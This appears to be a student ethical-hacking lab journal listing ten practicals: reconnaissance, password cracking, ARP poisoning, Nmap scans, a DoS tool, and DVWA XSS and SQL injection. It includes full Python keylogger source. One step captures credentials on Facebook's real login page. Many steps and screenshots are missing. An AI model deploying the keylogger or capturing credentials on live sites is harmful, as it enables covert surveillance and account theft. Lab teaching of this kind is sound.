EH Journal (2020) (E-Next - In)
EH Journal (2020) (E-Next - In)
EH Journal (2020) (E-Next - In)
Practical-1
Aim: Use Google and Whois for Reconnaissance
https://E-next.in
02
https://E-next.in
02
Practical-2
Aim:
a) Use CrypTool to encrypt and decrypt passwords using RC4 algorithm
b) Use Cain and Abel for cracking Windows account password using Dictionary attack
and to decode wireless network passwords.
Steps:
1. Install CrypTool from https://www.cryptool.org/en/ct1-downloads.
2. Plain Text
5. Click Encrypt.
8. Click Decrypt.
https://E-next.in
02
b) Use Cain and Abel for cracking Windows account password using dictionary attack
and to decode wireless network password.
1. Open the software, click on Cracker tab >> Hash Calculator tool as shown in the image.
https://E-next.in
02
https://E-next.in
02
https://E-next.in
02
Practical-3
Aim: a) Run and analyze the output of following commands in Linux –
ifconfig, ping, netstat, traceroute.
b) Perform ARP Poisoning in Windows
a) Linux Commands:
1. ifconfig
2. netstat
https://E-next.in
02
3. ping
4. traceroute
https://E-next.in
02
b) ARP Poisoning
Steps:
1) Click on Sniffer tab.
2) Click on Start/Stop Sniffer and give range values and click okay.
https://E-next.in
02
5) Click on Add Button(1) and select your router and any IP.
https://E-next.in
02
6) Click on the IP and then click on the button shown in the image to start ARP
Poisoning.
https://E-next.in
02
Practical – 4
Aim: Use NMap scanner to perform port scanning of various forms – ACK, SYN, FIN,
NULL, XMAS.
NOTE: Install Nmap for windows and install it. After that open cmd and type “nmap” to
check if it is installed properly. Now type the below commands.
https://E-next.in
02
https://E-next.in
02
Practical-5
Aim: a) Use Wireshark (Sniffer) to capture network traffic and analyze
b) Use Nemesy to launch DoS attack
https://E-next.in
02
3. Right Click on the POST method >> Follow >> TCP stream.
https://E-next.in
02
https://E-next.in
02
Practical – 6
Aim: Simulate persistent cross-site scripting attack.
Steps:
1. Extract the DVWA zip file.
2. Copy the folder and paste it in Drive C: > xampp > htdocs
3. Rename the file as DVWA.
4. Go in the config file and rename the file as config.inc.php
5. Open chrome and search localhost/DVWA.
6. Click on create/reset database. The database will be created. Click on login.
https://E-next.in
02
9. Click on XSS (Stored) write the script and click on sign guestbook. The script will be
executed whenever the page is reloaded.
https://E-next.in
02
https://E-next.in
02
Practical – 7
Aim: Session impersonation using Firefox and Tamper Data add-on.
Steps:
1. Open Firefox
2. Go to tools > Add on > Extension
3. Search and install Temper Data.
4. Go to facebook login page.
5. Now click on tamper add on and start tampering the data.
6. Now enter the username and password in the facebook login page.
7. Your username and password is been captured using session impersonation.
https://E-next.in
02
https://E-next.in
02
https://E-next.in
02
15. Then click on OK and see the Data has been Tempered.
https://E-next.in
02
Practical – 8
Aim: Perform SQL injection attack.
Steps:
1. Extract the DVWA zip file.
2. Copy the folder and paste it in Drive C: > xampp > htdocs
3. Rename the file as DVWA.
4. Go in the config file and rename the file as config.inc.php
5. Open chrome and search localhost/DVWA.
6. Click on create/reset database. The database will be created. Click on login.
https://E-next.in
02
https://E-next.in
02
https://E-next.in
02
Practical – 9
Aim: Create a simple keylogger using python
Code:
from pynput.keyboard import Key, Listener
import logging
# if no name it gets into an empty string
log_dir = ""
# This is a basic logging function
logging.basicConfig(filename=(log_dir+"key_log.txt"), level=logging.DEBUG,
format='%(asctime)s:%(message)s:')
# This is from the library
def on_press(key):
logging.info(str(key))
# This says, listener is on
with Listener(on_press=on_press) as listener:
listener.join()
Output:
https://E-next.in
02
Practical – 10
Aim: Using Metasploit to exploit (Kali Linux).
Steps:
Boot kali linux in pendrive and open it in PC.
Open metasploit and type exit command to quit.
The directory will change to root@kali.
Type the following command.
https://E-next.in
02
https://E-next.in
02
https://E-next.in